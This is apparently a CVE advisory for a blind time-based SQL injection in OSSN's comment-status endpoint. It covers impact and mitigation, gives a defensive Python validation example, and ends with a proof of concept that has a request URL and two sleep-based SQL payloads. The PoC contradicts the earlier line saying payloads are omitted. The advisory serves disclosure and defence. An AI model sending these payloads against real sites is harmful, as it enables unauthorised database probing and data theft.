# CVE-2025-63585
**Blind Time-Based SQL Injection in /action/rtcomments/status (parameter: timestamp)**
A blind, time-based SQL injection vulnerability was found in the timestamp parameter of the /action/rtcomments/status endpoint. An authenticated attacker who can supply this parameter may be able to execute arbitrary SQL queries, potentially exposing or modifying sensitive data.
**Impact:** data disclosure, data modification, privilege escalation, and potential denial of service (DoS) through time-delay queries (depending on DB permissions).
**Mitigation:** Upgrade OSSN to version 8.9 or later. Additionally, ensure the application uses parameterized queries/prepared statements for all database access, validate timestamp input strictly (accept only expected numeric or ISO formats), enforce least-privilege for the DB account, and enable query timeouts and logging.
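The mitigation above combines two independent layers: strict input validation before the value reaches the database, and bound parameters so that whatever does reach it is treated as a value rather than SQL text. The following Python example is added here to illustrate both layers; it is not OSSN code (OSSN is PHP) and the `demo_comment_status` table, its columns and the sample rows are constructed for the demonstration. It uses an in-memory SQLite database so it runs offline; the timestamp payload it rejects is the one shown in the PoC below.

```python
import re
import sqlite3
from datetime import datetime, timezone

# Strict allow-list for the timestamp parameter: either a Unix epoch (1-10 digits)
# or an ISO-8601 date-time. Anything else, including SQL fragments, is rejected
# before it gets anywhere near the database.
EPOCH_RE = re.compile(r"^\d{1,10}$")
MAX_TIMESTAMP_LEN = 40


def parse_timestamp(raw):
    """Return an int Unix timestamp, or None when the input is not strictly a timestamp."""
    if not isinstance(raw, str) or len(raw) > MAX_TIMESTAMP_LEN:
        return None
    if EPOCH_RE.fullmatch(raw):
        return int(raw)
    try:
        # Python < 3.11 does not accept a trailing "Z", so normalise it first.
        dt = datetime.fromisoformat(raw.replace("Z", "+00:00"))
    except ValueError:
        return None
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)  # treat naive values as UTC
    return int(dt.timestamp())


def setup_demo_db():
    """In-memory SQLite table standing in for a comment-status table (constructed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE demo_comment_status ("
        "id INTEGER PRIMARY KEY, post_guid INTEGER NOT NULL, created INTEGER NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO demo_comment_status (post_guid, created) VALUES (?, ?)",
        [(18, 1759741000), (18, 1759741200), (19, 1759741300)],  # constructed rows
    )
    conn.commit()
    return conn


def handle_status_request(conn, params):
    """Stand-in for the endpoint handler: validate every input, then bind it as a parameter."""
    try:
        guid = int(str(params.get("guid", "")))
    except ValueError:
        return {"status": "rejected", "reason": "guid must be an integer"}
    ts = parse_timestamp(params.get("timestamp", ""))
    if ts is None:
        # Worth logging: a non-timestamp value in a timestamp field is an injection probe signature.
        return {"status": "rejected", "reason": "timestamp must be a Unix epoch or ISO-8601 value"}
    # Bound parameters are sent as values, never spliced into the SQL text,
    # so even a value that survived validation cannot change the query shape.
    cur = conn.execute(
        "SELECT id FROM demo_comment_status WHERE post_guid = ? AND created > ? ORDER BY id",
        (guid, ts),
    )
    return {"status": "ok", "ids": [row[0] for row in cur.fetchall()]}


if __name__ == "__main__":
    db = setup_demo_db()
    print(handle_status_request(db, {"guid": "18", "timestamp": "1759741100"}))
    print(handle_status_request(db, {"guid": "18", "timestamp": "(select*from(select(sleep(10)))a)"}))
```

The validation step is what makes the probe visible: a rejected request with a SQL-shaped timestamp is a clean log signal for the "enable logging" part of the mitigation, whereas a parameterized query alone would silently return no rows. Query timeouts and the least-privilege DB account are enforced on the database side and are not shown here.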
**Notes:** Exploit payloads are intentionally omitted for safety.
**github:** https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503
**PoC**
Send a POST request to `/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28`
Payload: `timestamp=(select*from(select(sleep(10)))a)`
<img width="1925" height="857" alt="image" src="https://github.com/user-attachments/assets/5429e5e5-414b-4b2f-b598-ce5761515d4a" />
Payload: `timestamp=(select*from(select(sleep(30)))a)`
<img width="1929" height="858" alt="image" src="https://github.com/user-attachments/assets/b00b531c-13d6-4d94-99f3-c6119d01d61d" />